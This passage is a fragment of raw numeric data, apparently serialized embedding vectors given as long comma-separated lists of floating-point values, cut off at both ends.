,0.021787044,-0.016663723,-0.0041512162,0.0156177245,-0.0022098967,0.028057778,-0.009940036,0.011015024,0.00485837,-0.0130461715,-0.0037028927,-0.00017450868,0.022633396,-0.02677789,-0.0016671472,0.023834975,0.0019620697,0.025402008,-0.015988585,-0.02396913,0.022340689,0.010576833,-0.023676313,0.0027958343,-0.009978613,-0.004428111,-0.026526209,-0.0043197633,-0.0049022054,-0.01364125,-0.0038324748,-0.013110731,-0.0021168704,0.008130586,-0.012437195,-0.022935279,-0.0010765818,-0.00084930833,0.024289116,0.008718856,-0.034937713,-0.005522584,-0.017442696,0.097224765,-0.017775651,-0.004618072,0.010174282,0.03841101,0.024555024,-0.008107122,-0.0062495833,-0.02299395,-0.0027318138,-0.0059943786,-0.043196518,0.0072409688,-0.006472022,-0.014242843,-0.014656912,0.0050415085,-0.0029481188,-0.005009791,0.014943065,-0.0033992904,-0.002253634,-0.0012770919,-0.018111676,-0.0122878,-0.037002016,-0.0047739334,0.010039822,-0.021066515,0.00836388,0.0054589612,-0.020891886,-0.0151600605,-0.013022138,0.0015690757,0.008118945,-0.0004045356,-0.004268923,-0.00086204853,0.019971836,0.018469298,0.005207572,-0.0053363964,-0.015483964,-0.0044797543,0.007386937,0.017172739,-0.007965014,-0.0031700975,0.028404767,-0.01843922,0.024024755,-0.005606719,0.007320022,0.0038903863,0.0071921805,-0.00034578214,-0.015326824,0.0029515154,0.0064036157,-0.0071435594,-0.012257273,-0.026116792,-0.0173526,0.0036862574,0.015249379,-0.013897405,-0.025276827,-0.0051822355,0.0094751995,-0.018394042,0.04181229,0.0035997129,-0.0057302588,0.0035611887,-0.009815936,0.011485421,-0.01785494,0.012450622,-0.0035680411,-0.009317117,-0.0024349391,-0.008999197,-0.011264825,-0.0019355719,-0.002795482,-0.008271837,-0.02010199,0.0025575946,0.0002467769,0.034307815,0.0032033033,0.00030500483,-0.0027354723,-0.019698525,-0.012279187,0.010772712,0.0034390476,0.0071663074,-0.024625802,-0.00069725665,0.0027701324,0.012534564,0.000031247844,-0.01452528,-0.013928108,-0.12473763,0.015734766,-0.0128721455,-0.0036355474,-0.0014971943,-0.015781822,0.013760024,0.05572485,-0.008806506,-0.04705423,-0.0016139254,0.016363503,0.003065816,0.0065890527,0.003598947,0.022387141,-0.0016330065,-0.030375643,-0.009717184,0.004392988,-0.0015400291,0.011529798,0.0039535924,0.00031545566,-0.009977891,0.017227469,-0.03447802,0.030720731,0.022057347,0.019093601,-0.008942733,0.0012235324,-0.0058032093,0.0135038905,0.003107248,-0.0051953513,-0.0074536973,0.013012142,0.0031015729,0.0022430785,0.003875216,-0.01525859,-0.0062036975,0.027881797,-0.0005773976,0.014642886,0.019601021,0.008026666,0.011865254,0.0011275862,0.008557773,0.004934021,0.020358408,0.004710551,0.0036981762,0.0073099625,-0.025434,0.024086975,0.015010337,0.0006601858,-0.014236866,0.016713366,-0.009445699,-0.0063633574,-0.01143706,0.001575049,-0.00096595904,-0.004383886,-0.01793291,-0.013623363,0.010082135,0.009207399,-0.008929187,0.00928716,-0.012751317,0.012031392,0.036317635,0.027055122,0.004867963,0.013052939,-0.029507175,-0.0035232443,-0.0023489343,0.009416695,-0.0013401466,-0.0035603861,-0.0022978515,0.010711317,-0.0014330404,0.0022753787,0.017723858,-0.0104044825,-0.008177467,-0.010104686,-0.0019326895,0.02036459,-0.031065626,0.04032743,0.017538408,0.0044653383,0.0055252356,0.0008986099,-0.01113,-0.01645078,-0.11489261,-0.012803259,0.025495786,-0.00616311,-0.015970977,-0.021440294,-0.010074757,0.0001301485,0.03520496,0.0121444985,-0.008038568,0.009674396,0.013010379,0.0015471005,0.010377924,-0.011940704,-0.05201022,0.0027965202,0.0012158757,-0.0066975714,0.010838267,0.0041590994,-0.03901035,0.0040140785,0.014535777,-0.013758304,0.025407406,0.021783741,0.01751758,-0.022162672,0.0035053373,0.0040248916,-0.017328283,0.00012940369,0.0005666105,-0.022991417,0.014263834,0.004587282,-0.00029105903,0.00913715,0.017015457,-0.015581349,-0.0000017727881,0.0033133344,-0.008329824,0.0047446014,0.0004338968,0.017626362,-0.004088851,0.0024069601,-0.009715797,0.0028464883,0.0011484275,-0.008202871,-0.007837941,-0.0091020595,-0.012574691,-0.0032594998,0.00045260214,0.024686389,-0.009921788,0.034742273,-0.029172348,-0.0007562338,0.010312818,0.02362958,-0.004420047,0.002597217,0.009146944,-0.010551884,-0.02432894,0.022691792,0.026676347,0.0038361805,0.016839543,0.019066118,-0.0063834027,0.03621734,0.021277878,-0.0016835157,-0.008573244,-0.018791556,-0.01067923,0.0070925676,-0.0007752826,0.001530951,0.001447129,0.024082368,-0.013562857,0.03150718,0.0036266309,0.025870603,-0.019085877,0.0052342685,0.007410946,0.015326305,0.02406103,0.0079375105,-0.022266757,0.004128553,-0.03983696,-0.0059439065,-0.004140935,0.0035369766,-0.011693769,0.010901122,-0.0046198806,0.0029135675,-0.022102745,0.005905653,0.019234456,-0.0011452454,-0.024281584,0.0104586715,-0.0011814885,-0.0022668333,0.001505157,-0.01673681,-0.010181879,0.028180368,-0.0036984116,0.011285537,-0.0058474327,-0.0047336924,-0.024638157,0.0052644704,-0.024395412,0.012596502,0.016664293,0.007722242,0.00039047547,-0.0037940824,0.008007824,-0.03231892,0.009179379,0.009672343,0.012704353,-0.012633612,0.02364407,0.0013930644,0.020603461,-0.027569368,0.018463211,0.015662527,-0.000080450685,-0.024313666,-0.008620813,-0.00034888947,-0.020043856,0.01632142,-0.023868995,-0.01897238,0.010179245,-0.00034601425,-0.0049356595,0.009183871,-0.029958712,0.0040651234,0.016027752,-0.0026987016,-0.0040968033,-0.0061583105,0.01216947,0.006618253,0.0060431394,-0.006334483,0.010090475,-0.012983599,0.001156902,-0.0094648795,0.009421503,-0.0017298661,-0.0018227156,-0.0104128895,0.020335732,0.0052849217,0.05037465,0.03268895,0.015978858,0.0183026,0.012241456,0.00058921904,-0.0154457595,0.0010840831,0.03173926,0.0018883676,-0.010649389,0.019069364,-0.0036313678,-0.008661162,0.023540793,-0.0118225245,-0.021815848,-0.016731214,0.006229577,0.015981682,-0.002639641,-0.01612026,0.013187357,0.011705771,0.006602337,0.0123600345,0.004829575,-0.012016862,-0.00073600817,0.005953026,0.0035223113,0.02204299,0.03889326,0.00053069944,-0.0136964535,-0.0069464594,-0.010043955,0.014235922,0.012091225,0.015482983,-0.023313018,-0.03634019,0.03291272,0.008562939,0.0031903975,-0.016748758,0.009462837,0.002557777,0.004474874,0.027664257,0.03257722,-0.009012318,-0.01378405,-0.0073439176,0.009220543,0.006331818,-0.013325865,0.008978104,0.002216432,-0.008859115,0.016642004,-0.010199146,0.0032194173,-0.0012540956,0.0067694345,0.016267933,0.02549671,0.015983628,0.002632865,0.005978067,0.0135111725,-0.009003005,-0.012057567,0.020322027,0.021463238,-0.0086156,-0.007483126,-0.00094614585,-0.019482186,-0.017534835,0.01470403,0.003734051,0.013794578,-0.013851687,-0.014366975,0.007101362,-0.012448989,0.011577973,0.0078343265,-0.012569091,0.021467522,-0.042600583,0.0006550436,-0.0029312097,0.01756704,0.0027895868,0.00075264607,0.013902719,0.024477458,-0.012952795,-0.013024075,-0.006589314,-0.0022716667,0.0026782157,0.006011226,-0.024328817,-0.00908042,0.01667309,-0.009665722,-0.00025392533,-0.018654473,-0.002406708,-0.020860827,-0.0009363952,0.001144901,-0.007723845,-0.0023171667,-0.015029928,-0.023165945,0.010365676,0.029586546,-0.00783503,0.008184096,-0.009020288,0.00011339074,-0.0044004535,-0.0025571354,0.003887095,-0.0016426919,-0.018050373,-0.0018070254,0.02501362,0.0030374133,-0.013144788,0.019592075,-0.008209454,-0.0121496245,0.015769675,0.004876257,0.007714548,-0.021182783,0.0041437377,-0.016523305,-0.012796974,0.0009349961,-0.0025200495,0.019400325,0.005152764,0.023051161,0.009943805,0.038944032,0.0042675296,-0.025369603,0.000109070716,0.024081444,0.026709976,-0.00015341344,-0.027164385,0.011575433,-0.0029611283,0.0132652875,0.019915324,0.017241213,0.020412905,0.004153002,0.014015006,-0.0005271553,-0.008069634,0.0024971827,-0.00850622,0.0030092963,-0.030734494,0.013974222,0.011035066,0.0007844576,0.00848606,0.007518924,-0.0012221857,0.008057432,-0.013650138,-0.002459496,-0.0015773635,0.009818668,-0.005880124,-0.021665089,0.0094788335,-0.011239472,0.008678547,-0.010625068,-0.017777855,0.009502585,0.02977282,-0.0035198114,-0.00037939925,-0.0057785828,0.0033673893,-0.007673102,-0.012893329,-0.007977602,-0.076883286,0.00660425,0.011000073,-0.019822912,0.013628837,0.011769189,-0.0111818705,-0.006374803,-0.009747717,0.015655246,-0.0052702865,-0.0047957776,0.00094617554,0.018357448,0.008888736,-0.0012670573,0.0014357377,0.013436373,-0.0026716322,-0.0066832127,0.0037252086,0.03293059,0.0064760344,-0.0053847553,0.01079515,-0.0031639838,-0.0046097934,0.005368323,0.013677628,0.010149437,0.0047020265,0.007320165,-0.001523685,-0.018161414,0.0056661395,0.011406572,-0.010817959,0.010941341,0.0067342655,-0.03279589,-0.00406735,-0.003588611,0.01142591,-0.017613739,-0.004953186,0.037164588,-0.020085316,-0.023984078,-0.018335534,0.00059100846,0.005497289,0.01333297,-0.013963012,0.028746003,0.014065081,0.012989989,-0.009141918,-0.009244439,0.031414226,0.002024899,-0.0114689525,-0.007854577,0.03832135,-0.006949946,0.009846054,0.012053802,-0.009444778,0.0102252485,-0.0029608756,0.008098758,0.008415197,-0.016399657,-0.021357518,-0.0017211441,-0.0047830106,0.018184628,-0.003198486,-0.00943185,0.010573033,0.0017840811,0.023136504,0.0008046466,0.0002292305,-0.011955239,0.0013067962,0.00880726,-0.02282945,0.008627452,0.029479668,0.00540409,0.0143216895,0.0021430545,0.007605039,-0.001991893,-0.0046926257,0.010882164,0.0062152715,-0.0070661823,0.0164597,0.015707735,-0.013783621,0.0018155101,0.0070637367,-0.0059275297,-0.0036063653,-0.010035675,-0.01560953,0.0058935275,0.0020486703,0.0044717845,-0.010189403,0.015337916,0.0059543424,0.019556895,0.016504211,-0.0011956835,0.0030717014,0.011692759,-0.008389043,-0.021475574,-0.009352957,-0.024132634,-0.007694805,0.0037311038,-0.0039876793,0.0042969566,0.003287051,-0.0050255824,-0.004367467,-0.007121501,-0.009343946,0.0065077604,0.019866224,0.012978689,0.005270284,0.017784782,-0.0146279065,0.002179281,-0.016487202,0.0123206545,0.0019988948,-0.033217315,-0.0059854016,0.006409296,-0.020048466,0.038145896,-0.009522009,-0.011407326,0.00560885,0.0007995915,0.005109032,-0.011309378,0.022871632,0.008032702,0.0023493639,-0.0025381504,0.013736155,0.016046166,0.019306961,-0.005106743,0.003479012,0.020414816,0.022998646,0.00032712854,0.0039419676,0.018874545,0.0106354635,0.010848794,-0.01669681,-0.02105225,-0.011314669,0.0047092116,-0.00039675675,-0.006112557,-0.013879433,0.01216529,0.03226242,0.024484105,-0.0029697458,-0.010842505,-0.0014516951,-0.001781017,-0.00002523049,0.00798273,-0.030782372,0.0006353712,0.0049940404,-0.009423455,0.0070900344,-0.013433206,-0.0025296262,0.003902977,0.0058414843,0.026807794,-0.017982788,-0.015525576,0.004290015,0.01518831,-0.0032218208,0.011524753,-0.031131199,-0.006596319,-0.0002925023,0.030640226,0.016235793,0.0021110054,0.017467724,-0.0038883965,0.0029358245,0.025468837,0.0014394524,0.023104547,0.0038325526,0.11292356,0.014332894,-0.011687108,0.0007019901,0.007837701,0.0034794312,0.04062803,0.014257079,-0.0042716335,0.025098749,0.022379214,-0.010321002,-0.00045140446,-0.0025994722,-0.02745283,0.026694344,0.0303379,-0.007595233,-0.0058053797,-0.02728053,0.0068726204,-0.03883673,-0.024978872,-0.0159205,0.009460815,-0.06438239,0.014542593,0.043807216,-0.013753364,0.027213834,0.022363782,0.025388807,0.020222943,0.00896796,-0.027086888,0.0015940805,0.0026781266,-0.005958376,0.0072284644,-0.0027659433,-0.011460603,0.023015596,0.0020171395,-0.0043216143,-0.005327028,0.01954086,0.0043931985,-0.002330171,0.012202174,-0.024962699,0.0087418305,0.007486299,0.0197878,0.0026039877,0.02285858,0.008214348,-0.01517245,0.010833213,-0.0018546812,-0.0035143516,0.025588011,-0.014597238,0.012610316,0.015120938,0.024386648,-0.0077996925,-0.019911684,-0.015166726,-0.02512122,-0.039555077,0.037334614,-0.015448636,0.00029586075,0.021281306,-0.0095428005,0.030436065,-0.012081206,-0.033959467,-0.002218334,-0.006909065,0.014193247,-0.00040538755,-0.0031350683,-0.0052381256,0.005754161,0.0027348648,0.0055570346,0.0039998083,-0.022460219,0.0033185328,0.0049774987,0.026990972,0.0025841603,-0.0030488318,-0.009810008,-0.015610906,0.02357485,-0.0043186974,0.0040086997,0.011077026,0.0021699616,0.0014818623,-0.0028520788,0.012170082,-0.023331773,-0.010245091,0.0012479222,0.032502286,0.007605916,0.0040955883,0.002504203,-0.005002472,-0.0022068114,0.003482717,-0.00608946,-0.014343048,0.0026686315,-0.02953958,0.015244361,-0.013949598,-0.0071329908,0.020554293,0.03415238,0.025519973,0.0004398806,0.02317567,-0.0072904658,-0.0086707175,0.010212226,-0.009423033,0.0018018311,-0.05260195,-0.0146568995,0.011832802,0.0069012484,0.027635962,0.016737696,0.011654713,-0.0013314359,-0.008971851,0.009386171,-0.003670148,-0.0130455885,-0.013302991,0.005887421,-0.017398108,0.016407732,-0.0014515406,0.017606,0.001861168,-0.002819114,0.013172274,-0.0050434307,-0.019387474,-0.028936947,-0.019982172,0.018723443,0.003803243,-0.011500164,-0.007554578,-0.016495459,0.009879583,0.0038933333,-0.042799257,0.03125255,0.002356849,-0.007644758,-0.016946822,-0.0044563483,0.017136615,-0.0041185506,-0.007555571,-0.0051444573,0.027965914,-0.007570477,-0.012921729,0.0045879483,0.012268869,-0.02209008,-0.0027479946,0.01618086,0.005263769,0.0056964536,0.022335924,-0.0045978585,-0.012058169,-0.0058145258,-0.0022583397,-0.0007175767,0.016485248,0.006413504,0.030297808,0.0014676177,0.0035890993,0.011178147,0.0066649984,-0.029810006,0.037832998,-0.032445014,-0.060729846,0.0052076904,-0.005841356,0.0019284673,-0.012999868,0.014176066,0.0035393494,0.008457381,-0.015957355,-0.010842515,0.01840833,0.023512596,0.0040880293,0.0047011417,-0.016394602,-0.015775377,0.0035571437,-0.026009565,-0.020423336,-0.030150408,0.009611359,-0.010123354,-0.03070837,-0.008884687,0.007188448,-0.012597252,-0.02502221,-0.018960811,0.021884201,0.016759215,-0.0079532815,0.005065407,0.0037767391,-0.021649752,-0.013969332,-0.016388541,-0.0030281215,0.02256983,0.005754105,-0.01236426,0.0024977813,0.0039631873,-0.020584593,0.0050454987,0.014492987,-0.034496877,-0.006896343,0.009646043,-0.015644684,-0.027576668,-0.038465872,-0.02314801,0.00447166,-0.030865388,-0.0041034357,-0.019842831,-0.015085151,-0.016288845,0.01471627,0.016831363,-0.006941285,0.006740791,0.003595156,0.02204701,-0.006757261,-0.010704519,0.00025405857,0.0025608074,-0.015596444,-0.0060909004,-0.020896884,-0.012481924,-0.020035742,-0.023021104,-0.0004118477,-0.010091835,0.01349533,-0.018486068,-0.024798825,-0.03302622,0.022727262,-0.0020192163,-0.013664677,0.015270919,-0.016059164,-0.0006010563,0.001905034,0.00081898674,-0.004533431,0.050887987,-0.057595,-0.008016489,0.021515617,-0.011788624,-0.0015252966,0.0027913577,-0.01632853,-0.053926222,-0.038301073,0.03863275,-0.0087330565,-0.016493075,-0.007812628,0.014842612,-0.0050149206,-0.012048362,0.00713242,-0.0049908855,0.012032477,-0.0013905449,0.028743526,-0.007900356,-0.0020301738,-0.014972063,-0.021401452,-0.022634128,-0.001098984,0.014075389,0.012063672,0.0139671145,0.020859288,0.012371552,-0.027701722,-0.002219955,-0.003561846,0.003340053,-0.0027753012,0.029618835,-0.010670909,-0.018136919,-0.025435172,0.012977296,-0.01556488,0.0049729184,0.012030512,-0.0045773475,0.0068842196,0.0035831814,0.1423548,0.0042897016,-0.0152029535,-0.00907984,-0.0034240687,-0.020256864,-0.01189885,0.01752049,-0.004011222,0.0009969715,0.0035063133,-0.006293957,0.0039857663,0.0025071416,0.018118495,-0.011466106,0.014007979,0.15107942,0.005317312,0.020240895,0.017358325,-0.01619133,0.037215468,0.017304424,0.0018307677,-0.041208763,-0.012235856,-0.029445741,0.013219602,0.01088367,0.0030251683,0.014932944,0.012015326,-0.0025624693,0.01137867,0.0059331874,0.0059609273,-0.00064929086,-0.025543634,-0.016537193,0.018606221,-0.015047366,-0.008021906,-0.00066152215,0.00020308235,0.020546751,-0.015031216,-0.007876828,0.013615786,0.021297554,0.011038319,-0.014708668,0.005029726,-0.0034331698,0.019027464,0.023446282,0.004090808,0.013874266,-0.012969288,0.022549152,0.0047539966,0.006796571,-0.02597042,-0.00084399787,-0.012298137,0.016594995,0.0027205385,-0.0029257874,0.0054797954,0.012562755,-0.0034573418,0.006970798,-0.018712632,0.009933886,-0.016003123,0.0024748442,-0.012735378,-0.016903918,0.034445032,-0.0053462223,0.028698772,0.009627766,-0.011451954,0.0032593084,0.010293698,0.011773626,0.0071846773,0.00470376,0.010088394,-0.0012644735,-0.017822206,0.0012098647,-0.006105377,-0.012087632,-0.0022369009,0.0034558957,0.00632343,-0.012532908,0.0025737416,-0.013831486,-0.01145597,0.00857246,0.0015600321,0.018654812,-0.0062575927,0.0038406283,-0.017789802,0.00093787204,0.0029095612,0.0019476013,0.027826998,0.018325781,-0.011979948,0.016077373,-0.008101029,-0.011369831,0.0075357165,0.012702277,-0.025195226,0.004098319,-0.0055019152,-0.015400171,0.021472352,0.0024179104,-0.02160569,0.0029857124,0.017821109,0.0004507351,-0.029945672,0.0015828278,-0.0082553085,-0.019486116,0.018815542,0.023086965,0.010427181,-0.005474811,-0.003708071,-0.035963573,-0.004944032,-0.009924498,0.003671181,0.024097523,0.013414464,0.025300615,-0.013449104,-0.00793226,-0.0061343997,0.0050081583],[-0.014171658,0.0209232,0.010118145,-0.016741801,-0.005787593,0.00608233,-0.0051947148,0.02361291,0.017696645,0.010021885,0.01248753,0.023278108,-0.0056706634,0.010641061,-0.007749687,0.0042405543,0.00991911,0.0049142954,0.02316154,-0.0017041616,0.00835109,-0.016742077,0.019142669,-0.016938083,-0.014079036,0.010563692,0.028373899,-0.011601841,0.011162038,-0.0051116315,-0.012383887,0.022937458,-0.01690752,0.030435286,0.029390551,0.008521727,-0.012249699,-0.009377513,0.015368637,0.010512597,-0.012010646,0.0054182243,-0.00015323018,0.020636728,0.0034051565,-0.02085725,-0.024546511,-0.023004858,-0.008401282,-0.008713785,0.00043377664,0.023627644,-0.026922243,0.017135553,-0.005127414,0.0043640607,0.0010477618,-0.040825456,0.028378906,-0.009604823,-0.017094068,0.021482855,-0.0009428253,-0.0056021246,0.017380089,0.00072240323,-0.0014385511,-0.011003319,-0.0047958684,-0.00940961,0.021188345,0.014387988,-0.00032949127,-0.005552687,0.021562045,0.019156044,0.0091254655,-0.011356954,-0.018254753,-0.005325261,-0.02524853,-0.008116112,0.01603374,-0.016034724,0.0019427415,-0.009238442,0.0115362,-0.005719955,0.01090804,0.012899833,-0.027513128,0.01155958,0.0026255276,0.016705777,0.0021860653,0.041169282,0.01057694,-0.004068489,-0.00095180055,0.0005498859,0.0044473484,-0.011583156,-0.014483758,-0.002807148,0.010395274,0.0041617765,0.019722756,-0.00812985,0.010806795,0.004707414,0.0064521697,0.020456275,0.010674542,-0.0024532392,0.00539486,-0.0052114055,-0.011350423,0.019975578,-0.016467372,0.0053586992,-0.0065081734,-0.024860166,-0.0009201099,-0.010292507,-0.015140701,-0.0005896227,0.003178989,0.00071533903,-0.018246751,-0.014542631,-0.008397178,0.028314874,0.004463089,0.004525909,0.0027004047,-0.013911389,0.008931603,0.0052219755,0.009460101,-0.018900136,0.017678343,0.0071455957,0.011868001,0.01858125,0.024967968,0.02032949,-0.005610552,-0.0012541885,0.033534784,-0.0014507738,0.013812315,-0.0012859051,0.0012875687,0.00028250195,-0.003134174,-0.0037307933,-0.021359429,-0.020299632,-0.017942728,0.028627168,-0.0010644934,-0.0067033633,0.008267471,0.019583508,-0.0046615154,-0.0014559593,0.0050186925,0.010442626,-0.015937446,-0.0019085357,0.027304972,0.028110202,0.018704724,-0.009442411,0.013289156,-0.0070601664,0.012972707,-0.0033252588,0.010341738,0.012197078,0.013869807,0.01580312,0.0132068815,-0.0075984322,0.0033888218,0.018318998,0.017733695,0.002544919,-0.013501463,-0.018968081,-0.0071476796,-0.017946327,-0.013269375,0.0028053126,-0.022006843,-0.018437162,-0.017241469,0.10991692,-0.015591835,-0.01640717,-0.023625353,-0.0073995697,-0.011698769,-0.023608383,-0.017364217,-0.014618529,-0.02392393,-0.005693935,0.017103394,-0.0059330645,0.016834209,-0.022737904,0.02497873,-0.0063596223,0.022299305,-0.07415258,0.0028500904,0.035325877,-0.034137513,0.005212108,0.0010271333,0.008949892,0.002229995,-0.004683949,-0.024294773,-0.0063670604,0.015262782,0.0074507673,0.006478172,-0.0071633314,0.029183617,0.022411395,-0.022504259,-0.02009518,0.0024476517,-0.010469249,0.014438972,0.014699978,-0.0077656843,-0.005199149,-0.00832664,0.007810364,0.027112003,0.0062178783,0.0026355118,0.009051739,0.020299558,0.00541965,-0.004267377,0.0021307534,0.016069958,0.003970822,0.006224895,0.031827353,0.0058055925,-0.009892623,-0.0023217048,-0.012623725,-0.0021669788,0.024306193,0.01083948,0.025998961,-0.04303107,0.015964167,0.040344402,0.0008899872,-0.0028173912,-0.033318974,-0.023701204,-0.003280943,-0.020352427,0.0011827466,0.015612896,0.006232338,0.008381338,0.012601432,0.027460502,0.02083798,0.007891737,-0.011964112,-0.011217888,0.014966581,0.0038460204,-0.026235865,-0.021694427,-0.0031687927,0.023482803,-0.003355017,0.015663667,-0.006492957,0.0016154556,0.015382972,0.025286539,0.00064086926,0.012891675,-0.0028386465,-0.0020662427,0.036979176,0.0033333586,-0.004140632,0.0048396788,-0.008400588,0.016233984,0.010687158,-0.010253638,-0.0060323216,-0.017223705,0.021670705,-0.0015668605,0.01605577,-0.013543974,-0.016644955,-0.00974786,0.00657331,0.0069040526,-0.0000056874983,0.026866546,-0.01368487,-0.00021721181,-0.004268515,0.021940367,0.017152146,0.0020757192,-0.0034322075,-0.0049303668,-0.004365164,0.019939186,0.00056266086,0.0023569444,0.0035410128,0.008169134,-0.0010004938,0.017331215,0.014281703,-0.013661786,0.012477191,0.018610403,0.026887054,0.01069354,0.019172803,-0.008906432,0.0057925126,-0.016556729,0.007492811,0.005366014,-0.01106556,-0.00388813,-0.016189698,0.027009364,-0.002654122,-0.0072142617,-0.01729221,-0.0036810657,0.014309193,0.00018253025,-0.011947852,-0.02953827,-0.026548427,-0.022712564,-0.0076096645,0.01043219,-0.00024950763,0.02335338,-0.0061894325,0.032867648,-0.015180734,-0.005707526,0.0025770532,-0.004997618,-0.009274727,0.028554669,0.017020147,0.003369547,-0.010281632,0.0012542213,-0.011823815,0.0046816603,0.02434452,-0.022877956,-0.0018573178,-0.029661868,0.009695613,-0.02198826,-0.015051923,0.021395948,-0.0001463023,-0.031652518,0.0064110686,0.029529797,-0.0031781164,0.006019991,-0.00205883,0.006244997,-0.016961938,0.0019446316,-0.015824236,-0.0030097584,-0.01221232,-0.023403745,0.0064707617,-0.002795822,-0.010601647,-0.019665658,-0.0054334253,-0.015962522,-0.018079828,-0.012781934,0.0048814137,-0.003601847,0.013437007,0.016247526,-0.015105357,0.007916958,0.005748908,0.008766415,0.019847345,-0.020777786,0.013017537,-0.0011784191,-0.0024608898,0.013846235,-0.030973608,0.0050144857,0.015232464,0.044150706,0.015516099,-0.025080359,-0.0015094962,-0.0008295626,0.026376285,0.0028092172,-0.0059720874,-0.01538194,0.011962903,-0.019220408,0.029094206,0.004010398,-0.009247662,-0.01746919,-0.000779547,-0.008152384,-0.014992899,-0.011224425,-0.009256102,-0.0055294726,-0.00600322,0.0005899611,0.017112475,0.0021123302,0.00019306432,-0.0033140916,0.0095186215,0.00401116,-0.005208809,0.023035835,0.0014066906,0.008446067,-0.014690348,0.032642536,0.019772615,0.03661035,-0.021312874,-0.0037266344,0.016860506,-0.011610705,-0.0009807321,0.01376817,-0.011385481,0.019355208,-0.00659588,0.00216352,-0.043960944,0.011732124,0.04257723,-0.022701006,-0.0062274197,0.0055388734,-0.02012134,-0.005491425,-0.00961516,-0.0022795035,-0.00881321,-0.011177498,0.003830749,0.026339252,0.000598687,0.0122179445,0.01569903,-0.0126917465,0.0016295118,-0.0027429317,-0.008062193,0.015666982,0.0142973745,0.01757485,0.014426753,0.016121939,-0.04083108,-0.004704188,0.003089564,-0.006022018,-0.023768004,0.035146236,-0.0016826546,-0.000081772676,0.004020165,0.015848216,0.0010311672,-0.0033906966,0.021645032,0.025297226,0.0031130183,0.010464682,0.018323654,-0.00135722,-0.0024912918,-0.003985859,-0.0017435518,0.0014521428,-0.017713314,0.020730967,-0.016880013,-0.019963175,-0.014127717,0.04398504,-0.032074634,0.006896549,-0.0050692325,-0.017345537,0.014400892,0.011439853,0.06057314,0.0044136033,-0.020196734,-0.015139345,0.009345211,0.0011122989,0.0022377924,-0.005053309,-0.014321619,0.01428508,0.017053086,0.016930591,-0.0018792792,0.015704334,-0.01439018,-0.0051298086,-0.0013856535,-0.027089043,-0.006046411,-0.0141185485,-0.00059953873,0.0009584321,-0.013190446,-0.02480516,-0.014769146,-0.002480883,0.0033701002,0.0009937857,-0.016137687,-0.008240219,-0.026125442,-0.0066538593,0.0076583144,-0.0055457153,0.0043664607,-0.010333873,-0.016389314,-0.006838525,-0.014688504,0.023404818,0.001464762,-0.00915662,0.006972685,0.016052885,0.020849854,0.0013664201,-0.025420146,-0.0026970112,-0.008768841,-0.025351992,-0.0064418996,0.023445819,0.0055767293,-0.005685731,-0.010752279,-0.007966204,0.015672158,0.006958317,-0.01972326,0.016218845,-0.0007648603,0.002418292,-0.010927354,-0.016623048,-0.011729411,-0.0029956729,0.012235966,-0.009480338,-0.005154304,-0.035354633,-0.023654873,-0.0016006326,0.002411006,-0.0057540187,0.0042258203,0.012793901,0.006429626,0.019745696,0.0070369546,-0.005940323,0.011473495,0.008779978,0.0098353,-0.0038373293,0.007382944,-0.008925151,-0.020928102,0.009083794,0.016628578,-0.015862808,0.009578305,0.008818728,0.0016938972,0.011679924,-0.015610288,0.02544293,-0.008480265,0.0020961552,0.0036716931,-0.0153545905,-0.015556483,-0.016241165,-0.0008066867,0.03892686,-0.003498077,0.011490231,-0.014580907,0.020640753,0.018966334,-0.025113773,-0.010184967,-0.072697386,0.016522849,0.030334372,0.02011645,-0.011062263,0.060078677,-0.019998688,0.021370262,-0.018842654,-0.007582854,-0.017015534,0.005448366,0.0073965094,0.0116110565,0.016889645,-0.0030067128,-0.017258603,-0.016555682,-0.0038799755,-0.038518548,0.014781618,0.021674396,0.001170079,-0.006027149,0.006116873,0.0058851237,0.020262137,0.0004866286,0.00458973,-0.008054884,0.000071969866,0.026866809,0.014319972,-0.0100283595,0.0033421703,-0.008463107,-0.0070407526,0.012577783,0.0009166707,0.00022043953,0.012211808,-0.024210766,-0.00454856,-0.0012217571,0.00094212266,0.031513363,0.007576614,-0.0006397891,-0.023139734,0.04082495,-0.0000041281273,0.0072251433,-0.024945885,-0.002940884,-0.017294692,-0.0053200093,-0.006797381,0.014085562,-0.018721879,0.0071171904,-0.0030373903,0.020568943,0.008264014,0.015083858,0.017089373,0.017375004,0.00952123,-0.0101604285,-0.0086414255,0.0015437589,0.012019389,0.027549302,0.012245848,0.010044223,-0.0055282637,0.008507513,0.0054613245,-0.004459825,-0.004534605,-0.00019244601,0.0029546595,-0.0032498017,-0.02420012,0.027155502,0.030697683,-0.01685046,0.01837816,-0.0148541,-0.0029947215,-0.023336763,-0.006214198,-0.0029419689,-0.025065603,-0.006831583,-0.0077856774,-0.017149586,-0.0085903965,-0.026215574,-0.010550648,0.024506943,0.024194261,-0.023645034,-0.01027046,-0.028671565,-0.0033220346,-0.00001475175,-0.02290851,-0.02716017,-0.009181585,0.03931967,-0.02332323,0.017742626,-0.0046148454,-0.014016333,-0.003488218,0.032853436,-0.01632984,0.0024955792,0.0034803713,-0.012170858,-0.004780502,0.038227078,0.0019046362,-0.0144546395,-0.020287463,0.026103199,-0.008890412,-0.0068230694,0.0075957393,0.0035459364,0.038395874,-0.012124464,-0.020471767,0.00649055,0.0006395706,-0.024787568,0.026504368,-0.01033398,0.010758333,-0.0051688557,0.034481738,-0.009290122,0.0059844726,-0.025511125,0.050076,0.0017641663,0.0013441686,-0.0095970305,0.00092471915,-0.005345428,0.017962283,0.0055465763,-0.018882638,-0.028742887,-0.026620878,0.037575923,0.013536971,-0.013865534,0.003933477,-0.014428825,-0.010129876,-0.028162269,0.009928322,-0.021552736,0.0019129523,-0.0009493191,-0.050392628,0.02461551,0.013335491,-0.000100950456,0.020088816,0.0045234514,0.0157997,0.00829473,0.0045972215,-0.013884401,-0.025641393,0.016949384,0.017895233,-0.019546777,-0.0010049744,-0.025578784,-0.032143965,-0.010275981,-0.008687418,-0.00241513,0.0179899,-0.007180109,0.0010227689,-0.006664545,0.01630365,0.0025278518,0.012953108,-0.02878293,-0.0034673344,0.0018154449,0.02398189,0.01709474,0.0034492968,-0.004706953,0.040063843,-0.008731702,-0.006510395,0.0027716972,-0.0116200745,-0.009072279,-0.012505522,-0.006255316,-0.010501571,-0.006584383,0.0067357593,-0.0016093701,0.004072052,0.017401198,-0.00062505587,0.00076605816,-0.0021661827,0.002350042,-0.015761957,0.022964187,-0.0057036416,-0.013615799,-0.0015918624,0.009789686,0.011797748,-0.003915221,-0.0068405247,0.022183845,-0.008997597,0.019519519,0.00814996,0.018745288,-0.0071051256,-0.016520746,-0.0039754505,-0.012730519,0.001005299,0.020366272,-0.01